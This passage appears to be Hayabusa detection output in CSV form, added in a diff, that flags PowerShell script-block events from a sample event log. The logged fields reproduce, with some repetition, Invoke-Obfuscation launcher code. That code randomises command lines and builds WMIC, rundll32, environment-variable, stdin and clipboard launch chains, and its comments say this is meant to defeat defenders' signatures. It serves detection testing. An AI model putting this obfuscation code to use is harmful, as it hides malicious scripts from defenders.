$ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. $CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. $ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. $ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. $ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. $ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = 